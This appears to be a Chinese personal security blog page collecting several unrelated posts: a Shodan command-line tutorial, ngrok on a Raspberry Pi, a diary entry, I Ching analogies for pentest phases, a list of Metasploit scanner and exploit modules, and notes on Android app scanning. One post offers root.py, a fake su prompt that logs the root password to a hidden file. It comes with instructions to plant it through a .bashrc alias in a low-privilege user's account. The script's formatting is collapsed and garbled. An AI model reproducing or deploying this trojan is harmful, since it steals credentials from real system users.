AZ0NE

关于我

网络安全爱好者

命令行模式有很多优点,比如导出搜索数据与解析搜索数据,还有可以指定显示数据得关键字段。



首先得去shodan 官网 注册一个用户,然后在用户中心有个开放的API KEY

之后会有用

把项目克隆到本地

git clone https://github.com/achillean/shodan-python.git

直接 

python setup.py

等安装完了就可以使用了

某些功能普通的API是无法使用的,比如scan命令

使用之前首先初始化

shodan init YOUR_API_KEY

shodan count +"查询内容" 是统计条目数


shodan download apche-data apche

就可以下载100条json数据



shodan parse --fields ip_str,port,org --separator , apache-data.json.gz

解析json数据 指定显示IP地址,端口,组织或运营商 字段



shodan myip 看自己的IP

shodan search --fields ip_str,port,org,hostnames apache

搜索关键词apache 显示IP,端口,机构或运营商,主机名

按下键可以显示更多,按q退出

shodan host +ip

查看某IP的信息

shodan host 127.0.0.1/24

查看某网段信息

shodan stats apche

统计前十各国apache服务器的数量


 

如果不差钱可以买个付费的API 直接用python 写更符合自己需求的的查询


最近感覺都不在狀態,心太累了,有時候會想青春餵狗了嗎,在沒有網絡手機平板的時代,在這狂熱之夏可以約上兄弟一頭扎進江裡,可以去野營去爬山,看著周圍麻木的心,空洞的眼,會恐懼,彷彿一座空城,會立馬把自己吞噬。於是我去尋找一些陌生人,渴望他們能告訴我點什麼,感謝上天如此眷戀我,我遇到一個蘿莉,與這個陌生的蘿莉一起划了旱冰,吃了飯,看了電影,她讓我想起了我小時的一個玩伴,是個假小伙,我們曾經瘋狂的騎著自行車繞著城市狂飛,可是那個人的樣子我早已記不清。傍晚熱浪已經變暖,吹在身上彷彿漫步在傍晚的沙灘,夏天必然是躁動的,也讓沈迷,這正如青春也是如此狂熱

wget http://cdn.tunnel.org.cn/ngrok/linuxarm/ngrok.zip

unzip ngrok.zip

cd ngrok

http://cdn.tunnel.org.cn/ngrok/us/ngrok.cfg

./ngrok -config ngrok.cfg -subdomain example 80    //example为域名 80为端口

访问http://example.tunnel.org.cn 即可访问树莓派的web服务


Elasticsearch Groovy任意命令执行漏洞EXP




GIT地址

元、享、利、贞

天行健,君子以自强不息;

地势坤,君子以厚德载物。

潜:潜龙勿用 (信息收集)藏起来吧

见:见龙在田,利见大人(初步尝试,小见成果)有点技术了

惕:君子终日乾乾,夕惕若,厉无咎(正式攻击,宁可无功,不可有过)胡作非为

跃:或跃在渊,无咎(外网,内网突破,勿要有过错)走正道,入黑伙

飞:飞龙在天,利见大人(内网环境任你行)世界任你行

亢:亢龙有悔(回顾总结,忏悔)

终极真理 群龙无首:不要使用固定的方法,随时要应变 君子终日乾乾,夕惕若,厉,无咎。(磨,使锋利:厉兵秣马,再接再厉)

整句的意思是一个胸怀大志、道德高尚的人,应当自强自立,健进不休,终日不懈,晚上也要戒惧警省。如能常以危厉自警,虽处危地,最终不能有咎害。  

黄裳:九阴真经的创始人,实则应为六阴真经。

初难知,上易知;二多誉,五多功;

三多凶,四多惧(不三不四) 

履霜,坚冰至:安全意识,防范意识(数据收集)

直方大:正直,方正,大气,不要有习性(设同一密码,明文保存密码)(数据处理)含章可贞:人类93%的行为可预测,就算是给王室做事,又有何难?要坚持,没有成就也要做完善。 (章:规则,规章,才华)(数据存储)

含章可贞:含蓄地处事,保持住美好的德行,如果去从政,不居功、有美德而不显耀,就有个好的结果。

括囊:守口如瓶,把事情做好,没有错误,也不要希望有表扬。(数据分析)

穿上黄衣服了(得到赏识了),这才开始好起来了。 (数据展示)

与龙相战(与黑客进行持久战)(数据应用)   

三层意思:1. 普通的攻击,渗透测试,做人2. 变通的防范,黑客追踪,做人

 

FROM renewjoy's GITHUB

转载RROM: 8090sec

web服务器信息扫描模块
============================================================

  • Module auxiliary/scanner/http/http_version

  • Module auxiliary/scanner/http/open_proxy

  • Module auxiliary/scanner/http/robots_txt

  • Module auxiliary/scanner/http/frontpage_login

  • Module auxiliary/admin/http/tomcat_administration

  • Module auxiliary/admin/http/tomcat_utf8_traversal

  • Module auxiliary/scanner/http/options

  • Module auxiliary/scanner/http/drupal_views_user_enum

  • Module auxiliary/scanner/http/scraper

  • Module auxiliary/scanner/http/svn_scanner

  • Module auxiliary/scanner/http/trace

  • Module auxiliary/scanner/http/vhost_scanner

  • Module auxiliary/scanner/http/webdav_internal_ip

  • Module auxiliary/scanner/http/webdav_scanner

  • Module auxiliary/scanner/http/webdav_website_content

    文件目录扫描模块

  • ============================================================ 

  • Module auxiliary/dos/http/apache_range_dos

  • Module auxiliary/scanner/http/backup_file

  • Module auxiliary/scanner/http/brute_dirs

  • Module auxiliary/scanner/http/copy_of_file

  • Module auxiliary/scanner/http/dir_listing

  • Module auxiliary/scanner/http/dir_scanner

  • Module auxiliary/scanner/http/dir_webdav_unicode_bypass

  • Module auxiliary/scanner/http/file_same_name_dir

  • Module auxiliary/scanner/http/files_dir

  • Module auxiliary/scanner/http/http_put

  • Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass

  • Module auxiliary/scanner/http/prev_dir_same_name_file

  • Module auxiliary/scanner/http/replace_ext

  • Module auxiliary/scanner/http/soap_xml

  • Module auxiliary/scanner/http/trace_axd

  • Module auxiliary/scanner/http/verb_auth_bypass

    web应用程序漏洞扫描模块
    ============================================================ 

  • Module auxiliary/scanner/http/blind_sql_query

  • Module auxiliary/scanner/http/error_sql_injection

  • Module auxiliary/scanner/http/http_traversal

  • Module auxiliary/scanner/http/rails_mass_assignment

  • Module exploit/multi/http/lcms_php_exec


 渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py'; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

root.py

 #!/usr/bin/pythonimport os, sys, getpass, timecurrent_time = time.strftime("%Y-%m-%d %H:%M")logfile="/dev/shm/.su.log"              //密码获取后记录在这里#CentOS                 #fail_str = "su: incorrect password"#Ubuntu              #fail_str = "su: Authentication failure"#For Linux Korea                    //centos,ubuntu,korea 切换root用户失败提示不一样fail_str = "su: incorrect password"try:passwd = getpass.getpass(prompt='Password: ');file=open(logfile,'a')file.write("[%s]t%s"%(passwd, current_time))   //截取root密码file.write('n')file.close()except:passtime.sleep(1)print fail_str                               //打印切换root失败提示  



娜迦信息公司的一份报告

报告中详细介绍了主要的安全问题,以及测试的例子,文中采用的自动测试方法是用python做静态与动态结和自动分析,静态分析的过程如下:

•apk->dex->jar->class->java->正则匹配

•apk->smali->正则匹配

反编译出Java代码进行扫描,包括:

–静态Url提取

–Webview远程代码执行

–DebugMode是否开启

–配置文件中是否有AllowBackup

–四大组件对外暴露

–是否包含Log.i等信息泄露

–是否信任所有证书(ALLOW_ALL_HOSTNAME_VERIFIER)

–发现pm install进行提醒

–umeng、支付宝、百度等key信息硬编码提醒


动态分析原理:

本地用Python脚本做代理服务器,抓到的数据包完整入库(http方法、Cookie、UA、POST值等),另外的Python扫描器从库中读取数据包进行漏洞Fuzz。


想找娜迦信息公司的python代码来研究,没有找到,于是找到国外一个类似功能的代码。

https://github.com/thypon/AndroidFuzz


链接: http://pan.baidu.com/s/1pRpvC 密码: z238

© AZ0NE | Powered by LOFTER